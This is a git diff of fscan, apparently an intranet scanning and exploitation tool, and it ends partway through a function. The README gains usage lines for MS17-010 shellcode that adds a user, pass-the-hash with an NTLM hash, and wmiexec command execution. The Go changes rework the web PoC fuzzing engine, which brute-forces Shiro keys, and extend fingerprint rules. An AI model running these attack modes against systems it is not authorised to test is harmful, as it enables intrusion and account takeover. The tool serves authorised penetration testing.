@@ -24,13 +24,14 @@
 * web漏洞扫描(weblogic、st2等,支持xray的poc)

 5.漏洞利用:
-* redis写公钥或写计划任务
-* ssh命令执行
+* redis写公钥或写计划任务  
+* ssh命令执行  
+* ms17017利用(植入shellcode),如添加用户等  

 6.其他功能:
 * 文件保存

-## usege
+# 3. 使用说明
 简单用法
 ``` 
 fscan.exe -h 192.168.1.1/24  (默认使用全部模块)
@@ -53,11 +54,18 @@ fscan.exe -hf ip.txt  (以文件导入)
 fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
 fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
 fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
+fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
+fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
+fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
+fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx(wmiexec无回显命令执行)
 ```
 编译命令
 ```
-go build -ldflags="-s -w " -trimpath
+go build -ldflags="-s -w " -trimpath main.go
+upx -9 fscan.exe (可选,压缩体积)
 ```
+arch用户安装  
+`yay -S fscan-git  或者 paru -S fscan-git`

 完整参数
 ```
@@ -135,9 +143,13 @@ go build -ldflags="-s -w " -trimpath
        在原有用户字典基础上,新增新用户
  -pwda string
        在原有密码字典基础上,增加新密码
+  -socks5
+        指定socks5代理 (as: -socks5  socks5://127.0.0.1:1080)
+  -sc 
+        指定ms17010利用模块shellcode,内置添加用户等功能 (as: -sc add)
 ```

-## 运行截图
+# 4. 运行截图

 `fscan.exe -h 192.168.x.x  (全功能、ms17010、读取网卡信息)`
 ![](image/1.png)
@@ -161,26 +173,8 @@ go build -ldflags="-s -w " -trimpath

 `go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量)`
 ![img.png](image/live.png)
-## 参考链接
-https://github.com/Adminisme/ServerScan  
-https://github.com/netxfly/x-crack  
-https://github.com/hack2fun/Gscan  
-https://github.com/k8gege/LadonGo   
-https://github.com/jjf012/gopoc

-
-# 404StarLink 2.0 - Galaxy
-![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
-
-fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) 中的一环，如果对fscan 有任何疑问又或是想要找小伙伴交流，可以参考星链计划的加群方式。
-
- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
-
-
-## Star Chart
-[![Stargazers over time](https://starchart.cc/shadow1ng/fscan.svg)](https://starchart.cc/shadow1ng/fscan)
-
-## 免责声明
+# 5. 免责声明

 本工具仅面向**合法授权**的企业安全建设行为，如您需要测试本工具的可用性，请自行搭建靶机环境。

@@ -193,7 +187,35 @@ fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-G
 在安装并使用本工具前，请您**务必审慎阅读、充分理解各条款内容**，限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。
 除非您已充分阅读、完全理解并接受本协议所有条款，否则，请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的，即视为您已阅读并同意本协议的约束。

-## 最近更新
+
+# 6. 404StarLink 2.0 - Galaxy
+![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)
+
+fscan 是 404Team [星链计划2.0](https://github.com/knownsec/404StarLink2.0-Galaxy) 中的一环，如果对fscan 有任何疑问又或是想要找小伙伴交流，可以参考星链计划的加群方式。
+
+- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community)
+
+
+# 7. Star Chart
+[![Stargazers over time](https://starchart.cc/shadow1ng/fscan.svg)](https://starchart.cc/shadow1ng/fscan)
+
+# 8. 捐赠
+ 如果你觉得这个项目对你有帮助，你可以请作者喝饮料🍹 [点我](image/sponsor.png)
+
+# 9. 参考链接
+https://github.com/Adminisme/ServerScan  
+https://github.com/netxfly/x-crack  
+https://github.com/hack2fun/Gscan  
+https://github.com/k8gege/LadonGo   
+https://github.com/jjf012/gopoc
+
+
+# 10. 最近更新
+[+] 2022/11/19 加入hash碰撞、wmiiexec无回显命令执行  
+[+] 2022/7/14 -hf 支持host:port和host/xx:port格式,rule.Search 正则匹配范围从body改成header+body,-nobr不再包含-nopoc.优化webtitle 输出格式  
+[+] 2022/7/6 加入手工gc回收,尝试节省无用内存。 -url 支持逗号隔开。 修复一个poc模块bug。-nobr不再包含-nopoc。  
+[+] 2022/7/2 加强poc fuzz模块,支持跑备份文件、目录、shiro-key(默认跑10key,可用-full参数跑100key)等。新增ms17017利用(使用参数: -sc add),可在ms17010-exp.go自定义shellcode,内置添加用户等功能。  
+新增poc、指纹。支持socks5代理。因body指纹更全,默认不再跑ico图标。    
 [+] 2022/4/20 poc模块加入指定目录或文件 -pocpath poc路径,端口可以指定文件-portf port.txt,rdp模块加入多线程爆破demo, -br xx指定线程  
 [+] 2022/2/25 新增-m webonly,跳过端口扫描,直接访问http。致谢@AgeloVito  
 [+] 2022/1/11 新增oracle密码爆破  
--- a/WebScan/InfoScan.go
+++ b/WebScan/InfoScan.go
@@ -28,11 +28,11 @@ func InfoCheck(Url string, CheckData *[]CheckDatas) []string {
 				infoname = append(infoname, rule.Name)
 			}
 		}
-		flag, name := CalcMd5(data.Body)
+		//flag, name := CalcMd5(data.Body)

-		if flag == true {
-			infoname = append(infoname, name)
-		}
+		//if flag == true {
+		//	infoname = append(infoname, name)
+		//}
 	}

 	infoname = removeDuplicateElement(infoname)
--- a/WebScan/WebScan.go
+++ b/WebScan/WebScan.go
@@ -40,12 +40,15 @@ func Execute(PocInfo common.PocInfo) {
 		common.LogError(errlog)
 		return
 	}
-	req.Header.Set("User-agent", "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1468.0 Safari/537.36")
-	if PocInfo.Cookie != "" {
-		req.Header.Set("Cookie", PocInfo.Cookie)
+	req.Header.Set("User-agent", common.UserAgent)
+	req.Header.Set("Accept", common.Accept)
+	req.Header.Set("Accept-Language", "zh-CN,zh;q=0.9")
+	if common.Cookie != "" {
+		req.Header.Set("Cookie", common.Cookie)
 	}
+	req.Header.Set("Connection", "close")
 	pocs := filterPoc(PocInfo.PocName)
-	lib.CheckMultiPoc(req, pocs, PocInfo.Num)
+	lib.CheckMultiPoc(req, pocs, common.PocNum)
 }

 func initpoc() {
--- a/WebScan/info/rules.go
+++ b/WebScan/info/rules.go
@@ -88,8 +88,7 @@ var RuleDatas = []RuleData{
 	{"CISCO_EPC3925", "code", "(Docsis_system)"},
 	{"CISCO ASR", "code", "(CISCO ASR)"},
 	{"H3C ER3200", "code", "(ER3200系统管理)"},
-	{"万户ezOFFICE", "headers", "(LocLan)"},
-	{"万户网络", "code", "(css/css_whir.css)"},
+	{"万户oa", "code", "(/defaultroot/templates/template_system/common/css/|/defaultroot/scripts/|css/css_whir.css)"},
 	{"Spark_Master", "code", "(Spark Master at)"},
 	{"华为_HUAWEI_SRG2220", "code", "(HUAWEI SRG2220)"},
 	{"蓝凌OA", "code", "(/scripts/jquery.landray.common.js)"},
@@ -110,7 +109,7 @@ var RuleDatas = []RuleData{
 	{"Citrix-XenServer", "code", "(Citrix Systems, Inc. XenServer)"},
 	{"H3C ER2100V2", "code", "(ER2100V2系统管理)"},
 	{"zabbix", "cookie", "(zbx_sessionid)"},
-	{"zabbix", "code", "(images/general/zabbix.ico|Zabbix SIA)"},
+	{"zabbix", "code", "(images/general/zabbix.ico|Zabbix SIA|zabbix-server: Zabbix)"},
 	{"CISCO_VPN", "headers", "(webvpn)"},
 	{"360站长平台", "code", "(360-site-verification)"},
 	{"H3C ER3108GW", "code", "(ER3108GW系统管理)"},
@@ -128,7 +127,7 @@ var RuleDatas = []RuleData{
 	{"H3C ER6300G2", "code", "(ER6300G2系统管理)"},
 	{"H3C ER3260", "code", "(ER3260系统管理)"},
 	{"华为_HUAWEI_SRG3250", "code", "(HUAWEI SRG3250)"},
-	{"exchange", "code", "(/owa/auth.owa)"},
+	{"exchange", "code", "(/owa/auth.owa|Exchange Admin Center)"},
 	{"Spark_Worker", "code", "(Spark Worker at)"},
 	{"H3C ER3108G", "code", "(ER3108G系统管理)"},
 	{"Citrix-ConfProxy", "code", "(confproxy)"},
@@ -145,7 +144,7 @@ var RuleDatas = []RuleData{
 	{"金和协同管理平台", "code", "(金和协同管理平台)"},
 	{"Citrix-NetScaler", "code", "(NS-CACHE)"},
 	{"linksys-vpn", "headers", "(linksys-vpn)"},
-	{"通达OA", "code", "(/static/images/tongda.ico|http://www.tongda2000.com|通达OA移动版)"},
+	{"通达OA", "code", "(/static/images/tongda.ico|http://www.tongda2000.com|通达OA移动版|Office Anywhere)"},
 	{"华为（HUAWEI）Secoway设备", "code", "(Secoway)"},
 	{"华为_HUAWEI_SRG1220", "code", "(HUAWEI SRG1220)"},
 	{"H3C ER2100n", "code", "(ER2100n系统管理)"},
@@ -169,9 +168,8 @@ var RuleDatas = []RuleData{
 	{"VMware vSphere", "code", "(VMware vSphere)"},
 	{"打印机", "code", "(打印机|media/canon.gif)"},
 	{"finereport", "code", "(isSupportForgetPwd|FineReport,Web Reporting Tool)"},
-	{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization)"},
+	{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization|sys/ui/extend/theme/default/style/profile.css|sys/ui/extend/theme/default/style/icon.css)"},
 	{"GitLab", "code", "(href=\"https://about.gitlab.com/)"},
-	{"用友", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"},
 	{"Jquery-1.7.2", "code", "(/webui/js/jquerylib/jquery-1.7.2.min.js)"},
 	{"Hadoop Applications", "code", "(/cluster/app/application)"},
 	{"海昌OA", "code", "(/loginmain4/js/jquery.min.js)"},
@@ -232,7 +230,7 @@ var RuleDatas = []RuleData{
 	{"帕拉迪统一安全管理和综合审计系统", "code", "(module/image/pldsec.css)"},
 	{"蓝盾BDWebGuard", "code", "(BACKGROUND: url(images/loginbg.jpg) #e5f1fc)"},
 	{"Huawei SMC", "code", "(Script/SmcScript.js?version=)"},
-	{"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\")"},
+	{"coremail", "code", "(/coremail/bundle/|contextRoot: \"/coremail\"|coremail/common)"},
 	{"activemq", "code", "(activemq_logo|Manage ActiveMQ broker)"},
 	{"锐捷网络", "code", "(static/img/title.ico|support.ruijie.com.cn|Ruijie - NBR|eg.login.loginBtn)"},
 	{"禅道", "code", "(/theme/default/images/main/zt-logo.png|zentaosid)"},
@@ -246,14 +244,20 @@ var RuleDatas = []RuleData{
 	{"Swagger UI", "code", "(/swagger-ui.css|swagger-ui-bundle.js|swagger-ui-standalone-preset.js)"},
 	{"金蝶政务GSiS", "code", "(/kdgs/script/kdgs.js|HTML5/content/themes/kdcss.min.css|/ClientBin/Kingdee.BOS.XPF.App.xap)"},
 	{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization|sys/ui/extend/theme/default/style/icon.css|sys/ui/extend/theme/default/style/profile.css)"},
-	{"用友NC", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg)"},
+	{"用友NC", "code", "(Yonyou UAP|YONYOU NC|/Client/Uclient/UClient.dmg|logo/images/ufida_nc.png|iufo/web/css/menu.css|/System/Login/Login.asp?AppID=|/nc/servlet/nc.ui.iufo.login.Index)"},
 	{"用友IUFO", "code", "(iufo/web/css/menu.css)"},
 	{"TELEPORT堡垒机", "code", "(/static/plugins/blur/background-blur.js)"},
 	{"JEECMS", "code", "(/r/cms/www/red/js/common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
 	{"CMS", "code", "(Powered by .*CMS)"},
-	{"editor", "code", "(editor)"},
-	{"ATLASSIAN-Confluence", "code", "(confluence.)"},
+	{"目录遍历", "code", "(Directory listing for /)"},
 	{"向日葵", "code", "({\"success\":false,\"msg\":\"Verification failure\"})"},
+	{"Kubernetes", "code", "(Kubernetes Dashboard</title>|Kubernetes Enterprise Manager|Mirantis Kubernetes Engine|Kubernetes Resource Report)"},
+	{"WordPress", "code", "(/wp-login.php?action=lostpassword|WordPress</title>)"},
+	{"RabbitMQ", "code", "(RabbitMQ Management)"},
+	{"dubbo", "headers", "(Basic realm=\"dubbo\")"},
+	{"Spring env", "code", "(logback)"},
+	{"ueditor", "code", "(ueditor.all.js|UE.getEditor)"},
+	{"亿邮电子邮件系统", "code", "(亿邮电子邮件系统|亿邮邮件整体解决方案)"},
 }

 var Md5Datas = []Md5Data{
--- a/WebScan/lib/check.go
+++ b/WebScan/lib/check.go
@@ -1,6 +1,7 @@
 package lib

 import (
+	"crypto/md5"
 	"fmt"
 	"github.com/google/cel-go/cel"
 	"github.com/shadow1ng/fscan/WebScan/info"
@@ -9,7 +10,6 @@ import (
 	"net/http"
 	"net/url"
 	"regexp"
-	"sort"
 	"strings"
 	"sync"
 	"time"
@@ -56,9 +56,13 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
 	c := NewEnvOption()
 	c.UpdateCompileOptions(p.Set)
 	if len(p.Sets) > 0 {
-		setMap := make(map[string]string)
-		for k := range p.Sets {
-			setMap[k] = p.Sets[k][0]
+		var setMap StrMap
+		for _, item := range p.Sets {
+			if len(item.Value) > 0 {
+				setMap = append(setMap, StrItem{item.Key, item.Value[0]})
+			} else {
+				setMap = append(setMap, StrItem{item.Key, ""})
+			}
 		}
 		c.UpdateCompileOptions(setMap)
 	}
@@ -73,92 +77,26 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
 		return false, err, ""
 	}
 	variableMap := make(map[string]interface{})
+	defer func() { variableMap = nil }()
 	variableMap["request"] = req
-
-	// 现在假定set中payload作为最后产出，那么先排序解析其他的自定义变量，更新map[string]interface{}后再来解析payload
-	keys := make([]string, 0)
-	keys1 := make([]string, 0)
-	for k := range p.Set {
-		if strings.Contains(strings.ToLower(p.Set[k]), "random") && strings.Contains(strings.ToLower(p.Set[k]), "(") {
-			keys = append(keys, k) //优先放入调用random系列函数的变量
-		} else {
-			keys1 = append(keys1, k)
+	for _, item := range p.Set {
+		k, expression := item.Key, item.Value
+		if expression == "newReverse()" {
+			if !common.DnsLog {
+				return false, nil, ""
+			}
+			variableMap[k] = newReverse()
+			continue
 		}
-	}
-	sort.Strings(keys)
-	sort.Strings(keys1)
-	keys = append(keys, keys1...)
-	for _, k := range keys {
-		expression := p.Set[k]
-		if k != "payload" {
-			if expression == "newReverse()" {
-				variableMap[k] = newReverse()
-				continue
-			}
-			out, err := Evaluate(env, expression, variableMap)
-			if err != nil {
-				//fmt.Println(p.Name,"  poc_expression error",err)
-				variableMap[k] = expression
-				continue
-			}
-			switch value := out.Value().(type) {
-			case *UrlType:
-				variableMap[k] = UrlTypeToString(value)
-			case int64:
-				variableMap[k] = int(value)
-			case []uint8:
-				variableMap[k] = fmt.Sprintf("%s", out)
-			default:
-				variableMap[k] = fmt.Sprintf("%v", out)
-			}
-		}
-	}
-
-	if p.Set["payload"] != "" {
-		out, err := Evaluate(env, p.Set["payload"], variableMap)
+		err, _ = evalset(env, variableMap, k, expression)
 		if err != nil {
-			//fmt.Println(p.Name,"  poc_payload error",err)
-			return false, err, ""
-		}
-		variableMap["payload"] = fmt.Sprintf("%v", out)
-	}
-
-	setslen := 0
-	haspayload := false
-	var setskeys []string
-	if len(p.Sets) > 0 {
-		for _, rule := range p.Rules {
-			for k := range p.Sets {
-				if strings.Contains(rule.Body, "{{"+k+"}}") || strings.Contains(rule.Path, "{{"+k+"}}") {
-					if strings.Contains(k, "payload") {
-						haspayload = true
-					}
-					setslen++
-					setskeys = append(setskeys, k)
-					continue
-				}
-				for k2 := range rule.Headers {
-					if strings.Contains(rule.Headers[k2], "{{"+k+"}}") {
-						if strings.Contains(k, "payload") {
-							haspayload = true
-						}
-						setslen++
-						setskeys = append(setskeys, k)
-						continue
-					}
-				}
-			}
+			fmt.Printf("[-] %s evalset error: %v", p.Name, err)
 		}
 	}
-
 	success := false
 	//爆破模式,比如tomcat弱口令
-	if setslen > 0 {
-		if haspayload {
-			success, err = clusterpoc1(oReq, p, variableMap, req, env, setskeys)
-		} else {
-			success, err = clusterpoc(oReq, p, variableMap, req, env, setslen, setskeys)
-		}
+	if len(p.Sets) > 0 {
+		success, err = clusterpoc(oReq, p, variableMap, req, env)
 		return success, nil, ""
 	}

@@ -179,8 +117,8 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
 				}
 				Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
 			}
-			rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
-			rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
+			rule.Path = strings.ReplaceAll(rule.Path, "{{"+k1+"}}", value)
+			rule.Body = strings.ReplaceAll(rule.Body, "{{"+k1+"}}", value)
 		}

 		if oReq.URL.Path != "" && oReq.URL.Path != "/" {
@@ -190,21 +128,27 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
 		}
 		// 某些poc没有区分path和query，需要处理
 		req.Url.Path = strings.ReplaceAll(req.Url.Path, " ", "%20")
-		req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")
+		//req.Url.Path = strings.ReplaceAll(req.Url.Path, "+", "%20")

-		newRequest, _ := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, req.Url.Path), strings.NewReader(rule.Body))
+		newRequest, err := http.NewRequest(rule.Method, fmt.Sprintf("%s://%s%s", req.Url.Scheme, req.Url.Host, string([]rune(req.Url.Path))), strings.NewReader(rule.Body))
+		if err != nil {
+			//fmt.Println("[-] newRequest error: ",err)
+			return false, err
+		}
 		newRequest.Header = oReq.Header.Clone()
 		for k, v := range Headers {
 			newRequest.Header.Set(k, v)
 		}
+		Headers = nil
 		resp, err := DoRequest(newRequest, rule.FollowRedirects)
+		newRequest = nil
 		if err != nil {
 			return false, err
 		}
 		variableMap["response"] = resp
 		// 先判断响应页面是否匹配search规则
 		if rule.Search != "" {
-			result := doSearch(strings.TrimSpace(rule.Search), string(resp.Body))
+			result := doSearch(strings.TrimSpace(rule.Search), GetHeader(resp.Headers)+string(resp.Body))
 			if result != nil && len(result) > 0 { // 正则匹配成功
 				for k, v := range result {
 					variableMap[k] = v
@@ -231,10 +175,6 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
 		successFlag := false
 		for _, rule := range rules {
 			flag, err := DealWithRule(rule)
-			//if err != nil {
-			//	fmt.Printf("[-] %s Execute Rule error: %s\n",p.Name,err.Error())
-			//}
-
 			if err != nil || !flag { //如果false不继续执行后续rule
 				successFlag = false // 如果其中一步为flag，则直接break
 				break
@@ -247,7 +187,8 @@ func executePoc(oReq *http.Request, p *Poc) (bool, error, string) {
 	if len(p.Rules) > 0 {
 		success = DealWithRules(p.Rules)
 	} else {
-		for name, rules := range p.Groups {
+		for _, item := range p.Groups {
+			name, rules := item.Key, item.Value
 			success = DealWithRules(rules)
 			if success {
 				return success, nil, name
@@ -279,12 +220,12 @@ func doSearch(re string, body string) map[string]string {

 func newReverse() *Reverse {
 	letters := "1234567890abcdefghijklmnopqrstuvwxyz"
-	randSource := rand.New(rand.NewSource(time.Now().Unix()))
+	randSource := rand.New(rand.NewSource(time.Now().UnixNano()))
 	sub := RandomStr(randSource, letters, 8)
-	if true {
-		//默认不开启dns解析
-		return &Reverse{}
-	}
+	//if true {
+	//	//默认不开启dns解析
+	//	return &Reverse{}
+	//}
 	urlStr := fmt.Sprintf("http://%s.%s", sub, ceyeDomain)
 	u, _ := url.Parse(urlStr)
 	return &Reverse{
@@ -295,323 +236,182 @@ func newReverse() *Reverse {
 	}
 }

-func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{}, req *Request, env *cel.Env, slen int, keys []string) (success bool, err error) {
-	for _, rule := range p.Rules {
-		for k1, v1 := range variableMap {
-			if IsContain(keys, k1) {
-				continue
-			}
-			_, isMap := v1.(map[string]string)
-			if isMap {
-				continue
-			}
-			value := fmt.Sprintf("%v", v1)
-			for k2, v2 := range rule.Headers {
-				rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
-			}
-			rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
-			rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
-		}
-
-		n := 0
-		for k := range p.Sets {
-			if strings.Contains(rule.Body, "{{"+k+"}}") || strings.Contains(rule.Path, "{{"+k+"}}") {
-				n++
-				continue
-			}
-			for k2 := range rule.Headers {
-				if strings.Contains(rule.Headers[k2], "{{"+k+"}}") {
-					n++
-					continue
-				}
-			}
-		}
-		if n == 0 {
+func clusterpoc(oReq *http.Request, p *Poc, variableMap map[string]interface{}, req *Request, env *cel.Env) (success bool, err error) {
+	var strMap StrMap
+	var tmpnum int
+	for i, rule := range p.Rules {
+		if !isFuzz(rule, p.Sets) {
 			success, err = clustersend(oReq, variableMap, req, env, rule)
 			if err != nil {
 				return false, err
 			}
-			if success == false {
-				break
+			if success {
+				continue
+			} else {
+				return false, err
 			}
 		}
-
-		if slen == 1 {
-		look1:
-			for _, var1 := range p.Sets[keys[0]] {
-				rule1 := cloneRules(rule)
+		setsMap := Combo(p.Sets)
+		ruleHash := make(map[string]struct{})
+	look:
+		for j, item := range setsMap {
+			//shiro默认只跑10key
+			if p.Name == "poc-yaml-shiro-key" && !common.PocFull && j >= 10 {
+				if item[1] == "cbc" {
+					continue
+				} else {
+					if tmpnum == 0 {
+						tmpnum = j
+					}
+					if j-tmpnum >= 10 {
+						break
+					}
+				}
+			}
+			rule1 := cloneRules(rule)
+			var flag1 bool
+			var tmpMap StrMap
+			var payloads = make(map[string]interface{})
+			var tmpexpression string
+			for i, one := range p.Sets {
+				key, expression := one.Key, item[i]
+				if key == "payload" {
+					tmpexpression = expression
+				}
+				_, output := evalset1(env, variableMap, key, expression)
+				payloads[key] = output
+			}
+			for _, one := range p.Sets {
+				flag := false
+				key := one.Key
+				value := fmt.Sprintf("%v", payloads[key])
 				for k2, v2 := range rule1.Headers {
-					rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+keys[0]+"}}", var1)
+					if strings.Contains(v2, "{{"+key+"}}") {
+						rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+key+"}}", value)
+						flag = true
+					}
 				}
-				rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[0]+"}}", var1)
-				rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
-				success, err = clustersend(oReq, variableMap, req, env, rule1)
-				if err != nil {
-					return false, err
+				if strings.Contains(rule1.Path, "{{"+key+"}}") {
+					rule1.Path = strings.ReplaceAll(rule1.Path, "{{"+key+"}}", value)
+					flag = true
 				}
-				if success == true {
-					break look1
+				if strings.Contains(rule1.Body, "{{"+key+"}}") {
+					rule1.Body = strings.ReplaceAll(rule1.Body, "{{"+key+"}}", value)
+					flag = true
+				}
+				if flag {
+					flag1 = true
+					if key == "payload" {
+						var flag2 bool
+						for k, v := range variableMap {
+							if strings.Contains(tmpexpression, k) {
+								flag2 = true
+								tmpMap = append(tmpMap, StrItem{k, fmt.Sprintf("%v", v)})
+							}
+						}
+						if flag2 {
+							continue
+						}
+					}
+					tmpMap = append(tmpMap, StrItem{key, value})
 				}
 			}
-			if success == false {
-				break
+			if !flag1 {
+				continue
+			}
+			has := md5.Sum([]byte(fmt.Sprintf("%v", rule1)))
+			md5str := fmt.Sprintf("%x", has)
+			if _, ok := ruleHash[md5str]; ok {
+				continue
+			}
+			ruleHash[md5str] = struct{}{}
+			success, err = clustersend(oReq, variableMap, req, env, rule1)
+			if err != nil {
+				return false, err
+			}
+			if success {
+				if rule.Continue {
+					if p.Name == "poc-yaml-backup-file" || p.Name == "poc-yaml-sql-file" {
+						common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name))
+					} else {
+						common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, tmpMap))
+					}
+					continue
+				}
+				strMap = append(strMap, tmpMap...)
+				if i == len(p.Rules)-1 {
+					common.LogSuccess(fmt.Sprintf("[+] %s://%s%s %s %v", req.Url.Scheme, req.Url.Host, req.Url.Path, p.Name, strMap))
+					//防止后续继续打印poc成功信息
+					return false, nil
+				}
+				break look
 			}
 		}
-
-		if slen == 2 {
-		look2:
-			for _, var1 := range p.Sets[keys[0]] {
-				for _, var2 := range p.Sets[keys[1]] {
-					rule1 := cloneRules(rule)
-					for k2, v2 := range rule1.Headers {
-						rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+keys[0]+"}}", var1)
-						rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+keys[1]+"}}", var2)
-					}
-					rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[0]+"}}", var1)
-					rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
-					rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[1]+"}}", var2)
-					rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[1]+"}}", var2)
-					success, err = clustersend(oReq, variableMap, req, env, rule1)
-					if err != nil {
-						return false, err
-					}
-					if success == true {
-						break look2
-					}
-				}
-			}
-			if success == false {
-				break
-			}
+		if !success {
+			break
 		}
-
-		if slen == 3 {
-		look3:
-			for _, var1 := range p.Sets[keys[0]] {
-				for _, var2 := range p.Sets[keys[1]] {
-					for _, var3 := range p.Sets[keys[2]] {
-						rule1 := cloneRules(rule)
-						for k2, v2 := range rule1.Headers {
-							rule1.Headers[k2] = strings.ReplaceAll(v2, "{{"+keys[0]+"}}", var1)
-							rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+keys[1]+"}}", var2)
-							rule1.Headers[k2] = strings.ReplaceAll(rule1.Headers[k2], "{{"+keys[2]+"}}", var3)
-						}
-						rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[0]+"}}", var1)
-						rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[0]+"}}", var1)
-						rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[1]+"}}", var2)
-						rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[1]+"}}", var2)
-						rule1.Path = strings.ReplaceAll(strings.TrimSpace(rule1.Path), "{{"+keys[2]+"}}", var3)
-						rule1.Body = strings.ReplaceAll(strings.TrimSpace(rule1.Body), "{{"+keys[2]+"}}", var3)
-						success, err = clustersend(oReq, variableMap, req, env, rule)
-						if err != nil {
-							return false, err
-						}
-						if success == true {
-							break look3
-						}
-					}
-				}
-			}
-			if success == false {
-				break
-			}
+		if rule.Continue {
+			//防止后续继续打印poc成功信息
+			return false, nil
 		}
 	}
 	return success, nil
 }

-func clusterpoc1(oReq *http.Request, p *Poc, variableMap map[string]interface{}, req *Request, env *cel.Env, keys []string) (success bool, err error) {
-	setMap := make(map[string]interface{})
-	for k := range p.Sets {
-		setMap[k] = p.Sets[k][0]
-	}
-	setMapbak := cloneMap1(setMap)
-	for _, rule := range p.Rules {
-		for k1, v1 := range variableMap {
-			if IsContain(keys, k1) {
-				continue
-			}
-			_, isMap := v1.(map[string]string)
-			if isMap {
-				continue
-			}
-			value := fmt.Sprintf("%v", v1)
-			for k2, v2 := range rule.Headers {
-				rule.Headers[k2] = strings.ReplaceAll(v2, "{{"+k1+"}}", value)
-			}
-			rule.Path = strings.ReplaceAll(strings.TrimSpace(rule.Path), "{{"+k1+"}}", value)
-			rule.Body = strings.ReplaceAll(strings.TrimSpace(rule.Body), "{{"+k1+"}}", value)
-		}
-
-		varset := []string{}
-		varpay := []string{}
-		n := 0
-		for k := range p.Sets {
-			// 1. 如果rule中需要修改 {{k}} 如username、payload
-			if strings.Contains(rule.Body, "{{"+k+"}}") || strings.Contains(rule.Path, "{{"+k+"}}") {
-				if strings.Contains(k, "payload") {
-					varpay = append(varpay, k)
-				} else {
-					varset = append(varset, k)
-				}
-				n++
-				continue
-			}
-			for k2 := range rule.Headers {
-				if strings.Contains(rule.Headers[k2], "{{"+k+"}}") {
-					if strings.Contains(k, "payload") {
-						varpay = append(varpay, k)
-					} else {
-						varset = append(varset, k)
-					}
-					n++
-					continue
-				}
+func isFuzz(rule Rules, Sets ListMap) bool {
+	for _, one := range Sets {
+		key := one.Key
+		for _, v := range rule.Headers {
+			if strings.Contains(v, "{{"+key+"}}") {
+				return true
 			}
 		}
-
-		for _, key := range varpay {
-			v := fmt.Sprintf("%s", setMap[key])
